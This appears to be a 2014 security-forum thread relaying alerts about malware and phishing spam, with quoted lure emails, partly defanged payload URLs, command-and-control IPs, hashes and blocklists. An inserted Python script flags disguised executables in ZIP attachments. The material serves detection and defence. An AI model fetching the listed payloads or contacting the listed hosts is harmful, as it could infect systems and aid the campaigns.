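                          ("benign", SAMPLE_BENIGN), ("renamed", SAMPLE_RENAMED)]:
        print(label, "suspicious" if is_suspicious(sample) else "clean", inspect_zip(sample))
```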

AplusWebMaster
2014-12-02, 14:43
FYI...

Fake Walmart 'Order Details' SPAM opens malware site
- http://www.hoax-slayer.com/walmart-order-details-malware.shtml
Dec 2, 2014 - "Email purporting to be from Walmart claims that you can click a link to read more information about a recent order. The email is a scam... Clicking the link opens a website that contains malware. This attack is very similar to another malware campaign in which -bogus- emails claim to be from Costco*...
> http://www.hoax-slayer.com/images/walmart-order-details-malware-1.jpg
This email, which claims to be from retail giant Walmart, advises that your order is ready to be picked up at any local store. It invites you to -click-a-link- to find out more information about the supposed order... the email is -not- from Walmart and has nothing to do with any order you have made. The goal of the email is simply to trick you into clicking the link. If you receive this email, you may be concerned that fraudulent purchases have been made in your name and click the link in the hope of finding out more details... the link opens a compromised website that harbours malware. In some versions, the malicious download may start automatically. In other cases, a notice on the website may instruct you to download a file to view the order information. Generally, the download will be a .zip file that contains a .exe file inside. Clicking the .exe file will install the malware on your computer. The exact malware payload delivered in such attacks may vary... This attack closely mirrors another current malware campaign that uses emails that falsely claim to be from Costco*. Again, the email claims that you can get information about a recent purchase by clicking a link. Clicking downloads a .zip file that contains malware."
* http://www.hoax-slayer.com/costco-order-notification-malware.shtml
Nov 28, 2014
> http://www.hoax-slayer.com/images/costco-order-notification-malware-2.jpg
___

Fake 'FEDEX TRACK' 'FEDEX INFO' SPAM - contains trojan
- http://blog.mxlab.eu/2014/12/02/fake-emails-from-fedex-track-or-fedex-info-contains-trojan/
Dec 2, 2014 - "... intercepted a new trojan distribution campaign by email with the subjects like:
- Ezekiel Francis your agent FEDEX
- Bullock, Tiger P. agent FEDEX
- Quin Greer FEDEX company
This email is sent from the -spoofed- address “FEDEX TRACK <******@ care .it>”, “FEDEX INFO <fedexservice@ care .info>” or “FEDEX INFO <fedextechsupport@ care .org>” and has the following body:
Dear Customer!
We attempted to deliver your package on December 2th, 2014, 10:50 AM.
The delivery attempt failed because the address was business closed or nobody could sign for it.
To pick up the package,please, print the invoice that is attached to this email and visit Fedex location indicated in the receipt.
If the package is not picked up within 48 hours, it will be returned to the shipper.
Label/Receipt Number: 45675665665
Expected Delivery Date: December 2th, 2014
Class: International Package Service
Service(s): Delivery Confirmation
Status: Notification sent
Thank you ...

The attached file Package.zip contains the 180 kB large file 45675665665.scr... At the time of writing, 3 of the 54 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/3848d21eddfb5d70a39406bf45652f6daed3432cbd61bef50e705350904ebd3b/analysis/
___

Iran hacks target airlines, energy, defense companies
- http://www.reuters.com/article/2014/12/02/us-cybersecurity-iran-idUSKCN0JG18I20141202
Dec 2, 2014 - "Iranian hackers have infiltrated major airlines, energy companies, and defense firms around the globe over the past two years in a campaign that could eventually cause physical damage, according to U.S. cyber security firm Cylance*. The report comes as governments scramble to better understand the extent of Iran's cyber capabilities, which researchers say have grown rapidly as Tehran seeks to retaliate for Western cyber attacks on its nuclear program... The California-based company said its researchers uncovered breaches affecting more than 50 entities in 16 countries, and had evidence they were committed by the same Tehran-based group that was behind a previously reported 2013 cyber attack on a U.S. Navy network. It did not identify the companies targeted, but said they included major aerospace firms, airports and airlines, universities, energy firms, hospitals, and telecommunications operators based in the United States, Israel, China, Saudi Arabia, India, Germany, France, England and others. Cylance said it had evidence the hackers were Iranian, and added the scope and sophistication of the attacks suggested they had state backing... Cylance Chief Executive Stuart McClure said the Iranian hacking group has so far focused its campaign - dubbed Operation Cleaver - on intelligence gathering, but that it likely has the ability to launch attacks. He said researchers who succeeded in gaining access to some of the hackers' infrastructure found massive databases of user credentials and passwords from organizations including energy, transportation, and aerospace companies, as well as universities. He said they also found diagrams of energy plants, screen shots demonstrating control of the security system for a major Middle Eastern energy company, and encryption keys for a major Asian airline... Cylance said its researchers also obtained hundreds of files apparently stolen by the Iranian group from the U.S. Navy's Marine Corps Intranet (NMCI). U.S. government sources had confirmed that Iran was behind the 2013 NMCI breach..."
* http://blog.cylance.com/operation-cleaver-prevention-is-everything
Dec 2, 2014
- http://www.cylance.com/operation-cleaver/?&__hssc=&__hstc&hsCtaTracking=d1078200-8921-49f2-ab9c-6f87b7a0c3ee|25e0e347-ef8e-475e-9c59-4b051299b3ea
___

Fake 'Voice Message from Message Admin' SPAM - leads to malware
- http://blog.mxlab.eu/2014/12/01/fake-emails-voice-message-0174669888-from-message-admin-leads-to-malware/
Dec 1, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Voice Message #0174669888” (number will vary). This email is sent from the -spoofed- address “Message Admin <NoRepse@ voiceservice .com>” and has the following body:

Voice redirected message
hxxp ://www.studio37kriswhite .com/voicemail/listen.php
Sent: Mon, 1 Dec 2014 19:06:35 +0000

Voice redirected message
hxp ://thepinkcompany .com/voicemail/listen.php
Sent: Mon, 1 Dec 2014 20:10:47 +0000

The embedded URL leads to a web page with a Javascript that is making use of an ActiveXObject to download the file voice646-872-8712_wav.zip. Once extracted, the 43 kB large file voice646-872-8712_wav.exe is present. The trojan is known as W32.HfsAutoA.631F, Trojan.DownLoader11.46947, UDS:DangerousObject.Multi.Generic, Upatre.FE or BehavesLike.Win32.Backdoor.pz.
The trojan is capable of starting a listening server, making HTTP requests, fingerprinting a system and communicating outbound. A service bowmc.exe will be installed, the TCP port 1034 will be opened and connections with the IP on ports 21410 and 21397 will be opened for outbound traffic. At the time of writing, 8 of the 55* AV engines did detect the trojan at Virus Total..."
* https://www.virustotal.com/en/file/8e3b9d3e0c04be729180a959c167ac3330fb4d3506e6ab5375a1876f2b1f6cca/analysis/1417468098/
... Behavioural information
TCP connections
192.186.219.137: https://www.virustotal.com/en/ip-address/192.186.219.137/information/
UDP communications
91.200.16.56: https://www.virustotal.com/en/ip-address/91.200.16.56/information/
91.200.16.37: https://www.virustotal.com/en/ip-address/91.200.16.37/information/

:mad: :fear::fear:

AplusWebMaster
2014-12-03, 16:45
FYI...

More malware on Crissic Solutions LLC
- http://blog.dynamoo.com/2014/12/more-malware-on-crissic-solutions-llc.html
3 Dec 2014 - "Another bunch of IPs on Crissic Solutions LLC, leading to what appears to be the Angler EK (see this URLquery report*):
167.160.164.102: https://www.virustotal.com/en/ip-address/167.160.164.102/information/
167.160.164.103: https://www.virustotal.com/en/ip-address/167.160.164.103/information/
167.160.164.141: https://www.virustotal.com/en/ip-address/167.160.164.141/information/
167.160.164.142: https://www.virustotal.com/en/ip-address/167.160.164.142/information/
... domains are being exploited (although there will probably be more soon)... Subdomains in use start with one of qwe. or asd. or zxc... Crissic Solutions LLC operates 167.160.160.0/19 which does have some legitimate sites in it, but since I have previously recommended** blocking 167.160.165.0/24 and 167.160.166.0/24 and now with -multiple- servers on 167.160.164.0/24 also compromised then I suspect that temporarily blocking the entire /19 is the way to go."
* http://urlquery.net/report.php?id=1417554412643

** http://blog.dynamoo.com/2014/11/tainted-network-crissic-solutions.html
___

Fake 'Fedex Unable to deliver your item' SPAM - malware
- http://myonlinesecurity.co.uk/fedex-unable-deliver-item-00486182-malware/
3 Dec 2014 - "'FedEx Unable to deliver your item, #00486182' pretending to come from FedEx International Economy with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
FedEx ®
Dear Customer,
We could not deliver your parcel.
Please, open email attachment to print shipment label.
Regards,
Francis Huber,
Delivery Agent.
(C) 2014 FedEx. The content of this message is protected by copyright and trademark laws. All rights reserved.

3 December 2014: Label_00486182.zip: Extracts to: Label_00486182.doc.js
Current Virus total detections: 4/55* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/8e78a7c9ae488585a690dc8b5f3b6ebafaf8451ec93462810bd632e51e228fd3/analysis/1417611902/
___

Be Wary of ‘Order Confirmation’ Emails
- http://krebsonsecurity.com/2014/12/be-wary-of-order-confirmation-emails/
Dec 3, 2014 - "If you receive an email this holiday season asking you to “confirm” an online e-commerce order or package shipment, please resist the urge to -click- the included -link- or attachment: Malware purveyors and spammers are blasting these missives by the millions each day in a bid to trick people into giving up control over their computers and identities.
'Order confirmation' malware email blasted out by the Asprox spam botnet:
>> http://krebsonsecurity.com/wp-content/uploads/2014/12/hd-asprox-600x273.png
Seasonal scams like these are a perennial scourge of the holidays, mainly because the methods they employ are reliably successful. Crooks understand that it’s easier to catch would-be victims off-guard during the holidays. This goes even for people who generally know better than to click on links and attachments in emails that spoof trusted brands and retailers, because this is a time of year when many people are intensely focused on making sure their online orders arrive before Dec. 25:
This Asprox malware email poses as a notice about a wayward package from a WalMart order.
>> http://krebsonsecurity.com/wp-content/uploads/2014/12/wm-asprox-600x308.png
According to Malcovery*, a company that closely tracks email-based malware attacks, these phony “order confirmation” spam campaigns began around Thanksgiving, and use both booby-trapped links and attached files in a bid to infect recipients’ Windows PCs with the malware that powers the Asprox spam botnet. Asprox is a nasty Trojan that harvests email credentials and other passwords from infected machines, turns the host into a zombie for relaying junk email...
Target is among the many brands being spoofed by Asprox this holiday season:
>> http://krebsonsecurity.com/wp-content/uploads/2014/12/tg-asprox-600x373.png
... do not click the embedded links or attachments..."

* http://blog.malcovery.com/blog/asprox-malware-threat-targets-holiday-shoppers
Dec 3, '14

:fear: :mad:

AplusWebMaster
2014-12-04, 18:04
FYI...

Something evil on 46.161.30.0/24
- http://blog.dynamoo.com/2014/12/something-evil-on-4616130024.html
4 Dec 2014 - "The IP address range of 46.161.30.0/24 (KolosokIvan-net) appears to be dedicated purely to providing phone-home servers for TorrentLocker or some other similar malware. In the past, this IP range has hosted various sites which have moved off... There are no legitimate sites in this network range, so I strongly recommend that you -block- the entire 46.161.30.0/24 range."
(More detail at the dynamoo URL above.)
___

Fake 'Quickbooks intuit unpaid invoice' SPAM - PDF malware
- http://myonlinesecurity.co.uk/quickbooks-intuit-unpaid-invoice-fake-pdf-malware/
4 Dec 2014 - "'Quickbooks intuit unpaid invoice' with a zip attachment pretending to come from Elena.Lin@ intuit .com <Elena.Lin@ quickbooks .com> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please review the attached invoice and pay this invoice at your earliest convenience. Feel free to contact us if you have any
questions.
Thank you.

4 December 2014 : invoice72.zip: Extracts to: invoice72.scr
Current Virus total detections: 6/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/300feec373535aa4fabfd8a157f1e5afa37af98f6a7d432b50078e16d77480c1/analysis/1417726300/
... Behavioural information
TCP connections
80.248.222.238: https://www.virustotal.com/en/ip-address/184.95.37.110/information/
198.58.84.150: https://www.virustotal.com/en/ip-address/198.58.84.150/information/
UDP communications
198.27.81.168: https://www.virustotal.com/en/ip-address/198.27.81.168/information/
192.95.17.62: https://www.virustotal.com/en/ip-address/192.95.17.62/information/
___

Fake 'FedEx Delivery' confirmation - phishing 419 SCAM
- http://myonlinesecurity.co.uk/fedex-delivery-notification-confirmation-phishing-419-scam/
4 Dec 2014 - "'FedEx Delivery Notification. (Confirmation)' pretending to come from FedEx Courier Delivery <FedExdelivery@ FedEx .com> is a phishing scam. When I first saw these emails start to come in, I thought it was a follow on to the current malware spreading campaign Fedex Unable to deliver your item, #00486182 malware but no, it is a pure and simple phishing scam trying to get you to voluntarily give your details. It is most likely a 419 scam which will ask for a fee to expedite the delivery. Just look at all the spelling and grammar mistakes in the email, but of course most victims just don’t read emails closely, just blindly follow instructions and do what is asked without thinking. Email looks like:

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/fedex_delivery_phish.jpg

... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Or whether it is a straight forward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details..."
___

Fake Air Canada emails with ticket and flight confirmation leads to malicious ZIP file
- http://blog.mxlab.eu/2014/12/03/new-fake-air-canada-emails-with-ticket-and-flight-confirmation-leads-to-malicious-zip-file/
Dec 3, 2014 - "... intercepted a new trojan distribution campaign by email with the subjects like:
Order #70189189901 successfully – Ticket and flight details
Order #70189101701 paid – E-ticket and flight details
This email is sent from the -spoofed- address “Aircanada .com” <tickets@ aircanada .com>” and has the following body:
Dear client,
Your order has been successfully processed and your credit card charged.
ELECTRONIC TICKET – 70189101701
FLIGHT – QB70189101701CA
DATE / TIME – Dec 4th 2014, 15:30
ARRIVING – Quebec
TOTAL PRICE / 575.00 CAD
Your ticket can be downloaded and printed from the following URL: ...
hxxps ://www.aircanada .com/travelInformation/viewOrderInfo.do?ticket_number=70189101701& view_pdf=yes
For information regarding your order, contact us by visiting our website: ...
Thank you for choosing Air Canada

The embedded URL does -not- point the browser to the real web site address but to hxxp ://ravuol .com/wp-content/plugins/revslider/temp/update_extract/revslider/pdf_ticket_QB70189189901CA.zip. Once this file is extracted you will have the 209 kB large file pdf_ticket_QB70189189901CA.pif. The trojan is known as Trojan.MalPack or a variant of Win32/Injector.BQPL. This trojan has the ability to fingerprint the system, start a server listening on the local machine, create Zeus mutexes, install itself to autorun, and modify local firewall and policies. At the time of writing, 2 of the 52* AV engines did detect the trojan at Virus Total..."
* https://www.virustotal.com/en/file/8aba09320c5a5844ceb64ef06624eda221578667a1fa59feb3b2c94aabae96fb/analysis/

ravuol .com / 192.232.218.114: https://www.virustotal.com/en/ip-address/192.232.218.114/information/

:mad: :fear:

AplusWebMaster
2014-12-05, 14:49
FYI...

Fake Voicemail SPAM - wav malware
- http://myonlinesecurity.co.uk/stuartclark146-voicemail-message-01438351556night-message-fake-wav-malware/
5 Dec 2014 - "'Voicemail Message (01438351556>Night Message) From:01438351556' pretending to come from stuartclark146@ gmx .com with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

IP Office Voicemail redirected message

5 December 2014: voicemsg.wav.zip : Extracts to: voicemsg.exe
Current Virus total detections: 3/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( sound) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a8d7a7b4c76fa4456b2aa0fd0107ef500382075a56b93564af037dd322232a9f/analysis/1417779780/
___

Fake Remittance Advice SPAM
- http://blog.dynamoo.com/2014/12/k-j-watking-co-fake-remittance-advice.html
5 Dec 2014 - "... The spam comes with an Excel spreadsheet which contains a malicious macro.
Some sample spams are as follows:
From: Brenton Glover
Date: 5 December 2014 at 07:20
Subject: Remittance Advice for 430.57 GBP
Please find attached a remittance advice for recent BACS payment.
Any queries please contact us.
Brenton Glover
Senior Accounts Payable Specialist
K J Watking & Co

I have seen two versions of these, neither of which are detected as malicious by any vendors [1] [2]. Each spreadsheet contains a different but similar malicious macro... which then download a binary... Recommended blocklist:
194.146.136.1
84.92.26.50
79.137.227.123
124.217.199.218 "
1] https://www.virustotal.com/en/file/84f5c7cca1d8d0d35dbe541a406a8ff188b46624248c60214f00d91faf219d66/analysis/1417773044/

2] https://www.virustotal.com/en/file/a92ed1870f948dfe0b57df27389185157b0d4b28805e06989a40fde0147267b1/analysis/1417773050/

- http://myonlinesecurity.co.uk/k-j-watking-co-remittance-advice-excel-malware/
5 December 2014 : BAC_002163F.xls (253KB) - Current Virus total detections: 0/55*
* https://www.virustotal.com/en/file/66ed083beb750b7c2d65210607f52ff2136dbdb9b9b89dfe88fdbef3c9cf826e/analysis/1417779426/
5 December 2014 : BAC_644385B.xls (290KB) - Current Virus total detections: 0/55**
** https://www.virustotal.com/en/file/a92ed1870f948dfe0b57df27389185157b0d4b28805e06989a40fde0147267b1/analysis/1417779139/

- http://blog.mxlab.eu/2014/12/05/email-remittance-advice-for-245-58-gbp-contains-malicious-xls-file/
Dec 5, 2014
> https://www.virustotal.com/en/file/367b3c188d2dc322c03de0204c66d4c7217a998c879c9ad471ba8e1f8db6a2c4/analysis/1417768835/
___

Fake Order/Invoice SPAM - malicious .doc attachment
- http://blog.dynamoo.com/2014/12/mathew-doleman-lightmoorhomescouk-spam.html
5 Dec 2014 - "This -spam- came through into my mailbox horribly mangled and needed some assembly to make it malicious (everything was in a Base 64 attachment). After some work it appears to have a malicious Word document attached.
From: Mathew Doleman [order@ lightmoorhomes .co .uk]
Date: 5 December 2014 at 08:32
Subject: Order no. 98348936010
Thank you for using our services!
Your order #98348936010 will be shipped on 08-12-2014.
Date: December 04, 2014
Price: 177.69
Payment method: Credit card
Transaction number: OVFTMZERLXVNPXLPXB
Please find the detailed information on your purchase in the attached file (2014-12-4_12-32-28_98348936010.doc)
Best regards,
Sales Department
Mathew Doleman
+07966 566663

The attachment is 2014-12-4_12-32-28_98348936010.doc which looks like an old-style .DOC file, but is actually a newer format .DOCX document, which is poorly detected by AV vendors* ... Some investigation shows that it contains a malicious macro... The macro downloads a file from http ://hiro-wish .com/js/bin.exe which is completely undetected by any AV vendor** at present... The VirusTotal report** shows it phoning home to:
46.4.232.200 (Dmitry Zheltov / Hetzner, Germany)
Recommended blocklist:
203.172.141.250
46.4.232.200
74.208.11.204
hiro-wish .com "
* https://www.virustotal.com/en/file/cbb8823189d908b7f11f4c51da179a0a43a93da4ecff6e83e2db7ab99a444717/analysis/1417776108/

** https://www.virustotal.com/en/file/e167ed90258a88c8f63338a76d5d92feb6f97702fba6c99e9c3300014fcc08b3/analysis/1417775973/
___

Fake 'Package delivery failed' SPAM - PDF malware
- http://myonlinesecurity.co.uk/package-delivery-failed-fake-pdf-malware/
5 Dec 2014 - "'Package delivery failed' pretending to come from Canada Post with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
From: Canada Post [mailto:shipping@ canadapost .ca]
Sent: December 5, 2014 2:31
To: e-Bills – [redacted]
Subject: Package delivery failed
Image removed by sender.
Dear customer,
A delivery attempt has been made on December 3rd, 2014.
The delivery failed because nobody was present at the receiver’s address.
Redelivery can be arranged by visiting our nearest office and presenting a printed copy of the shipping invoice.
TRACKING Number: 3765490000465274
Originating from : RICHMOND
The shipping invoice, necessary for the redelivery arrangements can be automatically downloaded by visiting the tracking section, in our website: ...

5 December 2014: canpost_3765490000465274_trk.zip: Extracts to:
canpost_3765490000465274_trk.pif . Current Virus total detections: 5/55*
... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/45469fa9aa80014b868ac02fc18997fcad8a25ee7b758cd5358897e126c81929/analysis/1417725574/
___

Halifax phish...
- http://myonlinesecurity.co.uk/halifax-phishing/
5 Dec 2014 - "This Halifax phishing attempt starts with an email saying 'Your Account' pretending to come from Halifax <update@halifax .co .uk> is one of the latest phish attempts to steal your Bank, credit card and personal details. This one only wants your personal details, and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well:
1] http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/halifax_phish_email.jpg
...
2] http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/halifax_fake-site.jpg
... the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format..."

:mad: :fear:
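The write-ups in this post keep returning to two defender-side checks: a ZIP attachment whose member is really an executable wearing a document's extension (Label_00486182.doc.js, voicemsg.exe, canpost_..._trk.pif, invoice72.scr), and a file whose extension contradicts its actual format (the ".doc" that is really a newer-format .DOCX container). The following script is an added example written for this thread; it is not code from myonlinesecurity, dynamoo or any of the quoted blogs. The archives and file bodies it scans are constructed inline and contain no real malware; the extension and magic-byte lists are the usual Windows and Office values, not anything taken from the samples above.

```python
"""Mail-gateway style checks for ZIP attachments and document magic bytes.

Added example (not from the quoted blogs).  Sample inputs are constructed.
"""
import io
import os
import zipfile

# Extensions Windows will execute on a double-click.  The spam runs above use
# .exe, .scr, .pif and .js behind a document-looking icon or a second extension.
EXECUTABLE_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js",
                   ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".cpl"}
# Extensions the lures claim to carry (doc.js, pdf.scr, wav.zip -> exe ...)
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".wav", ".jpg",
                 ".jpeg", ".txt"}

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # legacy .doc/.xls container
ZIP_MAGIC = b"PK\x03\x04"                           # OOXML (.docx/.xlsx) and .zip
PDF_MAGIC = b"%PDF-"


def classify_name(name):
    """Return the reasons a file name looks like a disguised executable."""
    base = os.path.basename(name).lower()
    root, ext = os.path.splitext(base)
    reasons = []
    if ext in EXECUTABLE_EXTS:
        reasons.append("executable extension " + ext)
        inner = os.path.splitext(root)[1]      # second-to-last extension
        if inner in DOCUMENT_EXTS:
            reasons.append("double extension: looks like " + inner)
    return reasons


def scan_zip_attachment(data):
    """Return {member_name: [reasons]} for every suspicious member of a ZIP.

    Nested ZIPs are descended (the 'Transaction confirmation' run used
    zip-in-zip); nested members are reported as outer.zip/inner_name.
    """
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            if info.filename.lower().endswith(".zip"):
                nested = scan_zip_attachment(zf.read(info))
                for inner_name, inner_reasons in nested.items():
                    findings[info.filename + "/" + inner_name] = inner_reasons
            reasons = classify_name(info.filename)
            if reasons:
                findings[info.filename] = reasons
    return findings


def magic_mismatch(filename, data):
    """Describe a contradiction between extension and leading bytes, else None."""
    ext = os.path.splitext(filename.lower())[1]
    head = data[:8]
    if ext in (".doc", ".xls") and not head.startswith(OLE2_MAGIC):
        if head.startswith(ZIP_MAGIC):
            return "extension %s but content is a ZIP container (OOXML?)" % ext
        return "extension %s but no OLE2 header" % ext
    if ext == ".pdf" and not head.startswith(PDF_MAGIC):
        return "extension .pdf but no %PDF- header"
    return None


def build_sample_zip(members):
    """Construct a ZIP blob from {name: bytes} (test data only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, body in members.items():
            zf.writestr(name, body)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed lookalikes of the attachment names quoted in this thread.
    inner = build_sample_zip({"sale2014-12-08_97164185939.scr": b"MZ-constructed"})
    outer = build_sample_zip({"Label_00486182.doc.js": b"// constructed",
                              "order2014-12-08_77951286043.zip": inner,
                              "notes.txt": b"harmless"})
    for member, why in sorted(scan_zip_attachment(outer).items()):
        print("BLOCK", member, "->", "; ".join(why))
    print(magic_mismatch("224245.doc", ZIP_MAGIC + b"\0" * 26))
```

Run it as a filter step before an attachment reaches a mailbox: anything `scan_zip_attachment` returns, or any non-`None` from `magic_mismatch`, is enough to quarantine the message regardless of what the AV engines say, which matters for the 0/55 samples in this post.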

AplusWebMaster
2014-12-08, 13:55
FYI...

Fake Invoice SPAM - malicious doc attachment
- http://blog.dynamoo.com/2014/12/soo-sutton-invoice-224245-from-power-ec.html
8 Dec 2014 - "... this -fake- invoice comes with a malicious Word document attached.
From: soo.sutton966@ powercentre .com
Date: 8 December 2014 at 10:57
Subject: INVOICE 224245 from Power EC Ltd
Please find attached INVOICE number 224245 from Power EC Ltd

Attached is one of two Word documents -both- with the name 224245.doc but with slightly different macros. Neither is currently detected by any AV vendors [1] [2]. Inside the DOC is one of two malicious macros... which then downloads an executable from one of the following locations:
http ://aircraftpolish .com/js/bin.exe
http ://gofoto .dk/js/bin.exe
This file is then saved as %TEMP%\CWRSNUYCXKL.exe and currently has zero detections at VirusTotal. The ThreatExpert report shows that it connects to:
203.172.141.250 (Ministry of Education, Thailand)
74.208.11.204 (1&1 Internet, US)
According to the Malwr report this executable drops a DLL with a slightly better detection rate of 5/53*.
Recommended blocklist:
203.172.141.250
74.208.11.204
aircraftpolish .com
gofoto .dk "
1] https://www.virustotal.com/en/file/638c38749b79a38a18d641e3b170e7feeebba21ab3b31ca2d98c5abc5832a150/analysis/1418035603/

2] https://www.virustotal.com/en/file/84d0d1b9544ae8862792796a7ef06e5924919c8ac9fe8b1fb495a4e2df98ed22/analysis/

* https://www.virustotal.com/en/file/8826cc73859b551a7f63db428e13924deeb969b45a7ac8d2cc9b6a4018511c88/analysis/1418037172/

- http://myonlinesecurity.co.uk/please-find-attached-invoice-number-224244-power-ec-ltd-word-doc-malware/
8 Dec 2014
___

Fake 'Transaction confirmation' SPAM - doc malware
- http://myonlinesecurity.co.uk/shipping-status-transaction-confirmation-fake-word-doc-malware/
8 Dec 2014 - "'Shipping status: Transaction confirmation' with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The subjects include (all having random numbers, senders, sales clerks names, telephone numbers, order numbers and amounts. Most pretend to come from sale@ or order@ < random company> )
Shipping status: Transaction confirmation: 77951286043
Order info: 50664959001
Payment info: 22908714125
Payment confirmation: 6322896965

They look like:
Shipping status: Transaction confirmation: 77951286043
Greetings,
Your order #77951286043 will be shipped on 16.12.2014.
Date: December 08, 2014. 01:27pm
Price: £163.10
Transaction number: 43595D828F1A5A
Please find the detailed information on your purchase in the attached file order2014-12-08_77951286043.zip
Yours truly,
Sales Department
Keisha Konick ...
-or-
Hello,
Your order #50664959001 will be shipped on 17-12-2014.
Date: December 08, 2014. 01:49pm
Price: £181.71
Transaction number: 1E51D75638EEDA4499
Please find the detailed information on your purchase in the attached file item2014-12-08_50664959001.zip
Kind regards,
Sales Department
Sanjuanita Mandeville ...

Every single attachment received so far today (and there are hundreds) has a different file # so it is difficult to get a viable detection rate at Virus total. The zip attachment extracts to another zip & then to a scr file with an icon looking like it is a word doc.
8 December 2014: order2014-12-08_77951286043.zip: Extracts to: sale2014-12-08_97164185939.scr
Current Virus total detections: 3/55* .
8 December 2014: item2014-12-08_24831482215.zip: Extracts to: item2014-12-08_79359848638.scr
Current Virus total detections: 5/55**
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/89be5f270a6a3db81b3e0bb84a1bbcfd228d12454eedd7537a5aa38361542f3c/analysis/1418050446/
... Behavioural information
TCP connections
157.56.96.55: https://www.virustotal.com/en/ip-address/157.56.96.55/information/
213.186.33.19: https://www.virustotal.com/en/ip-address/213.186.33.19/information/
95.101.0.96: https://www.virustotal.com/en/ip-address/95.101.0.96/information/
195.60.214.11: https://www.virustotal.com/en/ip-address/195.60.214.11/information/
217.16.10.3: https://www.virustotal.com/en/ip-address/217.16.10.3/information/
74.208.11.204: https://www.virustotal.com/en/ip-address/74.208.11.204/information/

** https://www.virustotal.com/en/file/8c968020120ca70d9d56102d3576d0d9e562a57413b7d437d9b4019a8a96b02f/analysis/1418050480/
... Behavioural information
TCP connections
191.232.80.55: https://www.virustotal.com/en/ip-address/191.232.80.55/information/
213.186.33.19: https://www.virustotal.com/en/ip-address/213.186.33.19/information/
95.101.0.90: https://www.virustotal.com/en/ip-address/195.60.214.11/information/
195.60.214.11: https://www.virustotal.com/en/ip-address/195.60.214.11/information/
217.16.10.3: https://www.virustotal.com/en/ip-address/217.16.10.3/information/
74.208.11.204: https://www.virustotal.com/en/ip-address/74.208.11.204/information/
___

Fake HSBC Advising SPAM - leads to malware
- http://blog.mxlab.eu/2014/12/08/fake-email-from-hsbc-advising-service-leads-to-malware/
Dec 8, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Payment Advice – Advice Ref:[GB659898] / CHAPS credits” (number in subject will vary). This email is sent from the spoofed address “HSBC Advising Service <advising.service@ hsbc .com>” and has the following body:
Sir/Madam,
Please download document from dropbox, payment advice is issued at the request of our customer. The advice is or your reference only.
Download link: ...
Yours faithfully,
Global Payments and Cash Management
HSBC ...

In this sample, the embedded URL directs us to hxxp ://paparellalogistica .it/banking/document.php where the file documentXXX.zip (name contains number that will vary) is downloaded. The trojan is known as Upatre-FAAJ!BADD639EC640, HB_Arkam or Virus.Win32.Heur.c. The trojan will create a new service gtpwz.exe on the system, modify some Windows registry and can connect to the IP 62.210.204.149 on port 33294 and 33321 for outbound traffic. At the time of writing, 5 of the 53* AV engines did detect the trojan at Virus Total..."
* https://www.virustotal.com/en/file/2ed5903942b5299ea69183aa040343338d220b66742c510c0895766fe0b70b9a/analysis/
... Behavioural information
TCP connections
62.210.204.149: https://www.virustotal.com/en/ip-address/62.210.204.149/information/
188.132.235.180: https://www.virustotal.com/en/ip-address/188.132.235.180/information/
UDP communications
208.97.25.20: https://www.virustotal.com/en/ip-address/208.97.25.20/information/
208.97.25.6: https://www.virustotal.com/en/ip-address/208.97.25.6/information/

:fear: :mad:

AplusWebMaster
2014-12-09, 13:29
FYI...

Something evil on 5.196.33.8/29
- http://blog.dynamoo.com/2014/12/something-evil-on-519633829.html
9 Dec 2014 - "This Tweet* from @Kafeine about the Angler EK drew my attention to a small block of OVH UK addresses of 5.196.33.8/29 which appear to be completely dedicated to distributing malware.
